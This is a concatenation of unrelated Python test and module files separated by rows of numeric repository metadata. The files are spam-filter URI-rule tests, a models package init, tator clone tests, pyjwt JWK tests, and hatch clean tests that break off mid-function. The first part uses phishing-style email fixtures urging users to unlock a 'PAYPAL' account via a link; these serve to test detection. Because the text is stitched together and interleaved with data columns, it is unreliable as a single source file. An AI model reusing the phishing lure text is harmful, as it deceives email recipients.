    """An ellipsis-shortened visible URL for a normal-length href is not truncation."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="https://www.PAYPAL.com/login/account-unlock">https://www.PAYPAL.com/...</a>
</html>"""
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_uri_truncated_superior_limit(self):
    """A URI longer than the parser's 8KB hard limit is dropped, so no rule fires."""
    # 8181 random characters pushes the full URI past the upper size limit.
    long_label = "".join(random.choice(ascii_letters + digits) for _ in range(8181))
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://%s.com">https://test.com</a>
</html>""" % long_label
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_uri_truncated(self):
    """A href just long enough to be cut short triggers CHECK_URI_TRUNCATED."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://%s.com">https://test.com</a>
</html>""" % self.long_text
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_URI_TRUNCATED'])
def test_check_for_uri_truncated_and_redirector_after(self):
    """Truncation and a trailing redirect URL fire both rules together."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://%s.com/https://ceva.com">https://test.com</a>
</html>""" % self.long_text
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 2, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_uri_truncated_redirector_before_and_ip_mismatch(self):
    """An IP href redirecting to an over-long domain fires all three rules."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://%s.com/">https://test.com</a>
</html>""" % self.long_text
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 3, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR','CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_uri_truncated_link_label(self):
    """Truncation is also detected inside a <link> element's href."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://%s.com">
</html>""" % self.long_text
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 1, ['CHECK_URI_TRUNCATED'])
def test_check_for_uri_truncated_superior_limit_link_label(self):
    """A <link> href beyond the 8KB hard limit is dropped, so no rule fires."""
    # 8181 random characters pushes the full URI past the upper size limit.
    long_label = "".join(random.choice(ascii_letters + digits) for _ in range(8181))
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://%s.com">
</html>""" % long_label
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 0, [])
def test_check_for_uri_truncated_and_redirector_after_link_label(self):
    """Two truncated hops plus a final domain fire truncation and redirector rules."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://%s.com/https://%s.com/https://ceva.com">
</html>""" % (self.long_text, self.long_text)
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 2, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_uri_truncated_redirector_before_link_label(self):
    """IP redirects preceding an over-long domain fire truncation and redirector rules."""
    msg = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://1.2.3.4/https://1.2.3.4/https://%s.com/">
</html>""" % self.long_text
    self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
    self.check_report(self.check_pad(msg), 2, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR'])
def suite():
    """Gather all the tests from this package in a test suite."""
    collected = unittest.TestSuite()
    # makeSuite picks up every method whose name starts with "test".
    collected.addTest(unittest.makeSuite(TestFunctionalURIEval, "test"))
    return collected
if __name__ == '__main__':
    # Run the suite defined above when this file is executed directly.
    unittest.main(defaultTest='suite')
| 34.770652
| 124
| 0.701429
| 4,928
| 31,989
| 4.343141
| 0.043831
| 0.053404
| 0.088305
| 0.044153
| 0.942578
| 0.939401
| 0.937158
| 0.930103
| 0.922628
| 0.917348
| 0
| 0.02831
| 0.156366
| 31,989
| 919
| 125
| 34.808487
| 0.764776
| 0.006752
| 0
| 0.788732
| 0
| 0.092958
| 0.484175
| 0.037193
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090141
| false
| 0
| 0.009859
| 0
| 0.105634
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b984ca137f26611b06781b40dbc5d934bb3499d1
| 166
|
py
|
Python
|
app/models/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | 2
|
2021-02-15T21:02:12.000Z
|
2021-10-14T19:05:34.000Z
|
app/models/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
app/models/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
from app.models.base import Base
from app.models.event import *
from app.models.user import *
from app.models.country import *
from app.models.country_status import *
| 33.2
| 39
| 0.801205
| 27
| 166
| 4.888889
| 0.333333
| 0.265152
| 0.492424
| 0.431818
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114458
| 166
| 5
| 39
| 33.2
| 0.897959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e0560d0780ce2fda9f86907e09eb0cafa8dc84b9
| 1,517
|
py
|
Python
|
test/test_clone_localization_type.py
|
cvisionai/tator-py
|
89d5ed3bfc3e824bdf73b6c0fc43180e09dc3782
|
[
"MIT"
] | 2
|
2020-06-11T02:17:43.000Z
|
2021-01-27T14:41:07.000Z
|
test/test_clone_localization_type.py
|
cvisionai/tator-py
|
89d5ed3bfc3e824bdf73b6c0fc43180e09dc3782
|
[
"MIT"
] | 39
|
2020-06-08T15:12:47.000Z
|
2022-03-31T20:05:17.000Z
|
test/test_clone_localization_type.py
|
cvisionai/tator-py
|
89d5ed3bfc3e824bdf73b6c0fc43180e09dc3782
|
[
"MIT"
] | 1
|
2020-06-13T00:09:10.000Z
|
2020-06-13T00:09:10.000Z
|
import tator
def test_clone_localization_type_same_host(host, token, project, image_type, video_type,
                                           box_type, clone_project):
    """Clone the media types, then a localization type, within a single host."""
    api = tator.get_api(host, token)
    # The localization type references media types, so clone those first and
    # build the old-id -> new-id mapping the clone helper expects.
    dest_video_type = tator.util.clone_media_type(api, video_type, clone_project).id
    dest_image_type = tator.util.clone_media_type(api, image_type, clone_project).id
    type_mapping = {video_type: dest_video_type,
                    image_type: dest_image_type}
    response = tator.util.clone_localization_type(api, box_type, clone_project,
                                                  type_mapping)
    assert isinstance(response, tator.models.CreateResponse)
def test_clone_localization_type_different_host(host, token, project, image_type, video_type,
                                                box_type, clone_project):
    """Clone a localization type passing an explicit destination API client."""
    api = tator.get_api(host, token)
    # Clone the referenced media types first and build the id mapping.
    dest_video_type = tator.util.clone_media_type(api, video_type, clone_project).id
    dest_image_type = tator.util.clone_media_type(api, image_type, clone_project).id
    type_mapping = {video_type: dest_video_type,
                    image_type: dest_image_type}
    # Same client object is reused as the "destination host" API here.
    response = tator.util.clone_localization_type(api, box_type, clone_project,
                                                  type_mapping, api)
    assert isinstance(response, tator.models.CreateResponse)
| 56.185185
| 93
| 0.645353
| 178
| 1,517
| 5.089888
| 0.146067
| 0.099338
| 0.14128
| 0.145695
| 0.96468
| 0.90287
| 0.794702
| 0.794702
| 0.794702
| 0.794702
| 0
| 0
| 0.285432
| 1,517
| 26
| 94
| 58.346154
| 0.835793
| 0
| 0
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0787f468a844a6da19f87a98fd4c593bb0a352b
| 7,966
|
py
|
Python
|
tests/test_api_jwk.py
|
michael-k/pyjwt
|
f02fa0dc87bfa7bc471f3d6d3ca579d66e8f95e0
|
[
"MIT"
] | null | null | null |
tests/test_api_jwk.py
|
michael-k/pyjwt
|
f02fa0dc87bfa7bc471f3d6d3ca579d66e8f95e0
|
[
"MIT"
] | null | null | null |
tests/test_api_jwk.py
|
michael-k/pyjwt
|
f02fa0dc87bfa7bc471f3d6d3ca579d66e8f95e0
|
[
"MIT"
] | null | null | null |
import json
import pytest
from jwt.algorithms import has_crypto
from jwt.api_jwk import PyJWK, PyJWKSet
from jwt.exceptions import InvalidKeyError, PyJWKError
from .utils import crypto_required, key_path
if has_crypto:
from jwt.algorithms import (
ECAlgorithm,
Ed25519Algorithm,
HMACAlgorithm,
RSAAlgorithm,
)
class TestPyJWK:
    """Tests for PyJWK construction from JWK dicts / JSON across key types."""

    @crypto_required
    def test_should_load_key_from_jwk_data_dict(self):
        """An RSA public JWK dict with alg/use/kid populates PyJWK fields."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            pub_key = algo.from_jwk(keyfile.read())
        key_data_str = algo.to_jwk(pub_key)
        key_data = json.loads(key_data_str)
        # TODO Should `to_jwk` set these?
        key_data["alg"] = "RS256"
        key_data["use"] = "sig"
        key_data["kid"] = "keyid-abc123"
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "RSA"
        assert jwk.key_id == "keyid-abc123"
        assert jwk.public_key_use == "sig"

    @crypto_required
    def test_should_load_key_from_jwk_data_json_string(self):
        """Same as the dict test, but entering through PyJWK.from_json."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            pub_key = algo.from_jwk(keyfile.read())
        key_data_str = algo.to_jwk(pub_key)
        key_data = json.loads(key_data_str)
        # TODO Should `to_jwk` set these?
        key_data["alg"] = "RS256"
        key_data["use"] = "sig"
        key_data["kid"] = "keyid-abc123"
        jwk = PyJWK.from_json(json.dumps(key_data))
        assert jwk.key_type == "RSA"
        assert jwk.key_id == "keyid-abc123"
        assert jwk.public_key_use == "sig"

    @crypto_required
    def test_should_load_key_without_alg_from_dict(self):
        """With no "alg" member, the algorithm is inferred from kty (RSA->RS256)."""
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "RSA"
        assert isinstance(jwk.Algorithm, RSAAlgorithm)
        assert jwk.Algorithm.hash_alg == RSAAlgorithm.SHA256

    @crypto_required
    def test_should_load_key_from_dict_with_algorithm(self):
        """An explicit algorithm= argument overrides/decides the algorithm."""
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data, algorithm="RS256")
        assert jwk.key_type == "RSA"
        assert isinstance(jwk.Algorithm, RSAAlgorithm)
        assert jwk.Algorithm.hash_alg == RSAAlgorithm.SHA256

    @crypto_required
    def test_should_load_key_ec_p256_from_dict(self):
        """EC P-256 keys map to ECAlgorithm with SHA-256."""
        with open(key_path("jwk_ec_pub_P-256.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "EC"
        assert isinstance(jwk.Algorithm, ECAlgorithm)
        assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA256

    @crypto_required
    def test_should_load_key_ec_p384_from_dict(self):
        """EC P-384 keys map to ECAlgorithm with SHA-384."""
        with open(key_path("jwk_ec_pub_P-384.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "EC"
        assert isinstance(jwk.Algorithm, ECAlgorithm)
        assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA384

    @crypto_required
    def test_should_load_key_ec_p521_from_dict(self):
        """EC P-521 keys map to ECAlgorithm with SHA-512."""
        with open(key_path("jwk_ec_pub_P-521.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "EC"
        assert isinstance(jwk.Algorithm, ECAlgorithm)
        assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA512

    @crypto_required
    def test_should_load_key_ec_secp256k1_from_dict(self):
        """EC secp256k1 keys map to ECAlgorithm with SHA-256."""
        with open(key_path("jwk_ec_pub_secp256k1.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "EC"
        assert isinstance(jwk.Algorithm, ECAlgorithm)
        assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA256

    @crypto_required
    def test_should_load_key_hmac_from_dict(self):
        """Symmetric ("oct") keys map to HMACAlgorithm with SHA-256."""
        with open(key_path("jwk_hmac.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "oct"
        assert isinstance(jwk.Algorithm, HMACAlgorithm)
        assert jwk.Algorithm.hash_alg == HMACAlgorithm.SHA256

    @crypto_required
    def test_should_load_key_hmac_without_alg_from_dict(self):
        """An "oct" key with its "alg" removed still defaults to HMAC-SHA256."""
        with open(key_path("jwk_hmac.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        del key_data["alg"]
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "oct"
        assert isinstance(jwk.Algorithm, HMACAlgorithm)
        assert jwk.Algorithm.hash_alg == HMACAlgorithm.SHA256

    @crypto_required
    def test_should_load_key_okp_without_alg_from_dict(self):
        """OKP Ed25519 keys map to Ed25519Algorithm without an "alg" member."""
        with open(key_path("jwk_okp_pub_Ed25519.json")) as keyfile:
            key_data = json.loads(keyfile.read())
        jwk = PyJWK.from_dict(key_data)
        assert jwk.key_type == "OKP"
        assert isinstance(jwk.Algorithm, Ed25519Algorithm)

    @crypto_required
    def test_from_dict_should_throw_exception_if_arg_is_invalid(self):
        """Malformed / unknown JWK members raise PyJWKError or InvalidKeyError."""
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            valid_rsa_pub = json.loads(keyfile.read())
        with open(key_path("jwk_ec_pub_P-256.json")) as keyfile:
            valid_ec_pub = json.loads(keyfile.read())
        with open(key_path("jwk_okp_pub_Ed25519.json")) as keyfile:
            valid_okp_pub = json.loads(keyfile.read())
        # Unknown algorithm
        with pytest.raises(PyJWKError):
            PyJWK.from_dict(valid_rsa_pub, algorithm="unknown")
        # Missing kty
        v = valid_rsa_pub.copy()
        del v["kty"]
        with pytest.raises(InvalidKeyError):
            PyJWK.from_dict(v)
        # Unknown kty
        v = valid_rsa_pub.copy()
        v["kty"] = "unknown"
        with pytest.raises(InvalidKeyError):
            PyJWK.from_dict(v)
        # Unknown EC crv
        v = valid_ec_pub.copy()
        v["crv"] = "unknown"
        with pytest.raises(InvalidKeyError):
            PyJWK.from_dict(v)
        # Unknown OKP crv
        v = valid_okp_pub.copy()
        v["crv"] = "unknown"
        with pytest.raises(InvalidKeyError):
            PyJWK.from_dict(v)
        # Missing OKP crv
        v = valid_okp_pub.copy()
        del v["crv"]
        with pytest.raises(InvalidKeyError):
            PyJWK.from_dict(v)
class TestPyJWKSet:
    """Tests for PyJWKSet construction from {"keys": [...]} dicts / JSON."""

    @crypto_required
    def test_should_load_keys_from_jwk_data_dict(self):
        """A one-key set built from a dict exposes the key with its metadata."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            pub_key = algo.from_jwk(keyfile.read())
        key_data_str = algo.to_jwk(pub_key)
        key_data = json.loads(key_data_str)
        # TODO Should `to_jwk` set these?
        key_data["alg"] = "RS256"
        key_data["use"] = "sig"
        key_data["kid"] = "keyid-abc123"
        jwk_set = PyJWKSet.from_dict({"keys": [key_data]})
        jwk = jwk_set.keys[0]
        assert jwk.key_type == "RSA"
        assert jwk.key_id == "keyid-abc123"
        assert jwk.public_key_use == "sig"

    @crypto_required
    def test_should_load_keys_from_jwk_data_json_string(self):
        """Same as the dict test, but entering through PyJWKSet.from_json."""
        algo = RSAAlgorithm(RSAAlgorithm.SHA256)
        with open(key_path("jwk_rsa_pub.json")) as keyfile:
            pub_key = algo.from_jwk(keyfile.read())
        key_data_str = algo.to_jwk(pub_key)
        key_data = json.loads(key_data_str)
        # TODO Should `to_jwk` set these?
        key_data["alg"] = "RS256"
        key_data["use"] = "sig"
        key_data["kid"] = "keyid-abc123"
        jwk_set = PyJWKSet.from_json(json.dumps({"keys": [key_data]}))
        jwk = jwk_set.keys[0]
        assert jwk.key_type == "RSA"
        assert jwk.key_id == "keyid-abc123"
        assert jwk.public_key_use == "sig"
| 30.638462
| 70
| 0.643234
| 1,065
| 7,966
| 4.507042
| 0.09108
| 0.068542
| 0.0425
| 0.05
| 0.86
| 0.855208
| 0.847292
| 0.839583
| 0.814375
| 0.801042
| 0
| 0.021116
| 0.250942
| 7,966
| 259
| 71
| 30.756757
| 0.783308
| 0.027115
| 0
| 0.714286
| 0
| 0
| 0.073007
| 0.020287
| 0
| 0
| 0
| 0.003861
| 0.217143
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.131429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ebcb7a9a7680a86597b1922d771c8e4087ac774
| 19,981
|
py
|
Python
|
tests/commands/test_clean.py
|
kapb14/hatch
|
e7f7e094571780d6499d41960999134966ae699d
|
[
"Apache-2.0",
"MIT"
] | 1
|
2018-03-15T17:27:37.000Z
|
2018-03-15T17:27:37.000Z
|
tests/commands/test_clean.py
|
anmolsrivastava05/hatch
|
df2c9d46ee7713a1bc156c361cfd0f78e5935297
|
[
"Apache-2.0"
] | null | null | null |
tests/commands/test_clean.py
|
anmolsrivastava05/hatch
|
df2c9d46ee7713a1bc156c361cfd0f78e5935297
|
[
"Apache-2.0"
] | null | null | null |
import os
from click.testing import CliRunner
from hatch.cli import hatch
from hatch.env import install_packages
from hatch.utils import create_file, temp_chdir
from hatch.venv import create_venv, venv
def find_all_files(d):
    """Return the full path of every file anywhere under directory *d*."""
    paths = []
    for root, dirs, files in os.walk(d):
        for name in files:
            paths.append(os.path.join(root, name))
    return paths
def assert_files_exist(files):
    """Assert that every path in *files* still exists on disk."""
    for path in files:
        assert os.path.exists(path)
def test_cwd():
    """`hatch clean` in the cwd removes .pyc files and egg-info, keeps the rest."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        files = find_all_files(d)
        test_file1 = os.path.join(d, 'test.pyc')
        test_file2 = os.path.join(d, 'ok.egg-info', 'entry_points.txt')
        create_file(test_file1)
        create_file(test_file2)
        assert os.path.exists(test_file1)
        assert os.path.exists(test_file2)
        result = runner.invoke(hatch, ['clean'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file1)
        assert not os.path.exists(os.path.join(d, 'ok.egg-info'))
        # Everything that existed before the junk was added must survive.
        assert_files_exist(files)
def test_project_ignore_venv():
    """By default the detected `venv` directory is left untouched by clean."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        files = find_all_files(d)
        test_file1 = os.path.join(d, 'test.pyc')
        test_file2 = os.path.join(d, 'venv', 'test.pyc')
        create_file(test_file1)
        create_file(test_file2)
        assert os.path.exists(test_file1)
        assert os.path.exists(test_file2)
        result = runner.invoke(hatch, ['clean'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file1)
        # The .pyc inside venv survives because venv detection skipped it.
        assert os.path.exists(test_file2)
        assert_files_exist(files)
def test_project_venv_no_detect():
    """With `-nd` (no detect), files inside `venv` are cleaned like any others."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        files = find_all_files(d)
        test_file1 = os.path.join(d, 'test.pyc')
        test_file2 = os.path.join(d, 'venv', 'test.pyc')
        create_file(test_file1)
        create_file(test_file2)
        assert os.path.exists(test_file1)
        assert os.path.exists(test_file2)
        result = runner.invoke(hatch, ['clean', '-nd'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file1)
        assert not os.path.exists(test_file2)
        assert_files_exist(files)
def test_cwd_compiled_only():
    """`clean -c` removes compiled files at every depth under the cwd."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        files = find_all_files(d)
        test_file1 = os.path.join(d, 'test.pyc')
        test_file2 = os.path.join(d, 'ok', 'test.pyc')
        test_file3 = os.path.join(d, 'ok', 'deeper', 'test.pyc')
        create_file(test_file1)
        create_file(test_file2)
        create_file(test_file3)
        assert os.path.exists(test_file1)
        assert os.path.exists(test_file2)
        assert os.path.exists(test_file3)
        result = runner.invoke(hatch, ['clean', '-c'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file1)
        assert not os.path.exists(test_file2)
        assert not os.path.exists(test_file3)
        assert_files_exist(files)
def test_compiled_only_project_ignore_venv():
    """`clean -c` skips compiled files under a detected `venv` directory."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        files = find_all_files(d)
        test_file1 = os.path.join(d, 'test.pyc')
        test_file2 = os.path.join(d, 'ok', 'test.pyc')
        test_file3 = os.path.join(d, 'ok', 'deeper', 'test.pyc')
        test_file4 = os.path.join(d, 'venv', 'test.pyc')
        create_file(test_file1)
        create_file(test_file2)
        create_file(test_file3)
        create_file(test_file4)
        assert os.path.exists(test_file1)
        assert os.path.exists(test_file2)
        assert os.path.exists(test_file3)
        assert os.path.exists(test_file4)
        result = runner.invoke(hatch, ['clean', '-c'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file1)
        assert not os.path.exists(test_file2)
        assert not os.path.exists(test_file3)
        # Only the venv-resident compiled file is spared.
        assert os.path.exists(test_file4)
        assert_files_exist(files)
def test_compiled_only_project_venv_no_detect():
    """`clean -c -nd` removes compiled files even inside `venv`."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        files = find_all_files(d)
        test_file1 = os.path.join(d, 'test.pyc')
        test_file2 = os.path.join(d, 'ok', 'test.pyc')
        test_file3 = os.path.join(d, 'ok', 'deeper', 'test.pyc')
        test_file4 = os.path.join(d, 'venv', 'test.pyc')
        create_file(test_file1)
        create_file(test_file2)
        create_file(test_file3)
        create_file(test_file4)
        assert os.path.exists(test_file1)
        assert os.path.exists(test_file2)
        assert os.path.exists(test_file3)
        assert os.path.exists(test_file4)
        result = runner.invoke(hatch, ['clean', '-c', '-nd'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file1)
        assert not os.path.exists(test_file2)
        assert not os.path.exists(test_file3)
        assert not os.path.exists(test_file4)
        assert_files_exist(files)
def test_package():
    """`clean <name>` resolves an editable package and cleans its directory."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--cli', '-ne'])
        package_dir = os.path.join(d, 'ok')
        files = find_all_files(package_dir)
        test_file = os.path.join(package_dir, 'test.pyc')
        create_file(test_file)
        assert os.path.exists(test_file)
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            # Install editable so `clean ok` can locate the package by name.
            os.chdir(package_dir)
            install_packages(['-e', '.'])
            os.chdir(d)
            result = runner.invoke(hatch, ['clean', 'ok'])
            assert result.exit_code == 0
            assert 'Cleaned!' in result.output
            assert not os.path.exists(test_file)
            # egg-info is preserved for an installed editable package.
            assert os.path.exists(os.path.join(package_dir, 'ok.egg-info'))
            assert_files_exist(files)
def test_package_not_exist():
    """`clean <name>` fails cleanly when the package was never installed."""
    with temp_chdir() as d:
        runner = CliRunner()
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            result = runner.invoke(hatch, ['clean', 'ok'])
            assert result.exit_code == 1
            assert '`{}` is not an editable package.'.format('ok') in result.output
def test_local():
    """`clean -l` auto-selects the single locally-installed editable package."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--cli', '-ne'])
        package_dir = os.path.join(d, 'ok')
        files = find_all_files(package_dir)
        test_file = os.path.join(package_dir, 'test.pyc')
        create_file(test_file)
        assert os.path.exists(test_file)
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            install_packages(['-e', package_dir])
            result = runner.invoke(hatch, ['clean', '-l'])
            assert result.exit_code == 0
            assert 'Package `ok` has been selected.' in result.output
            assert 'Cleaned!' in result.output
            assert not os.path.exists(test_file)
            assert os.path.exists(os.path.join(package_dir, 'ok.egg-info'))
            assert_files_exist(files)
def test_local_not_exist():
    """`clean -l` fails cleanly when no local editable package exists."""
    with temp_chdir() as d:
        runner = CliRunner()
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            result = runner.invoke(hatch, ['clean', '-l'])
            assert result.exit_code == 1
            assert 'There are no local packages available.' in result.output
def test_local_multiple():
    """`clean -l` refuses to guess when multiple local packages are installed."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
        runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
        venv_dir = os.path.join(d, 'venv')
        create_venv(venv_dir)
        with venv(venv_dir):
            install_packages(['-e', os.path.join(d, 'ok')])
            install_packages(['-e', os.path.join(d, 'ko')])
            result = runner.invoke(hatch, ['clean', '-l'])
            assert result.exit_code == 1
            assert (
                'There are multiple local packages available. '
                'Select one with the optional argument.'
            ) in result.output
def test_path_relative():
    """`clean -p` accepts a path relative to the current directory."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
        package_dir = os.path.join(d, 'ok')
        files = find_all_files(package_dir)
        test_file = os.path.join(package_dir, 'test.pyc')
        create_file(test_file)
        assert os.path.exists(test_file)
        result = runner.invoke(hatch, ['clean', '-p', 'ok'])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file)
        assert_files_exist(files)
def test_path_full():
    """`clean -p` accepts an absolute path, independent of the cwd."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
        runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
        package_dir = os.path.join(d, 'ok')
        files = find_all_files(package_dir)
        test_file = os.path.join(package_dir, 'test.pyc')
        create_file(test_file)
        assert os.path.exists(test_file)
        # Run from a sibling project to prove the absolute path is honored.
        os.chdir(os.path.join(d, 'ko'))
        result = runner.invoke(hatch, ['clean', '-p', package_dir])
        assert result.exit_code == 0
        assert 'Cleaned!' in result.output
        assert not os.path.exists(test_file)
        assert_files_exist(files)
def test_path_full_not_exist():
    """`clean -p` fails cleanly for a path that does not exist."""
    with temp_chdir() as d:
        runner = CliRunner()
        runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
        full_path = os.path.join(d, 'ko')
        result = runner.invoke(hatch, ['clean', '-p', full_path])
        assert result.exit_code == 1
        assert 'Directory `{}` does not exist.'.format(full_path) in result.output
def test_cache():
    """`hatch clean -v` removes a root-level `.cache` tree and lists the removed paths."""
    with temp_chdir() as root:
        runner = CliRunner()
        runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
        # A cache file nested inside the package dir is captured in the baseline,
        # so it is expected to survive the clean (verified by assert_files_exist).
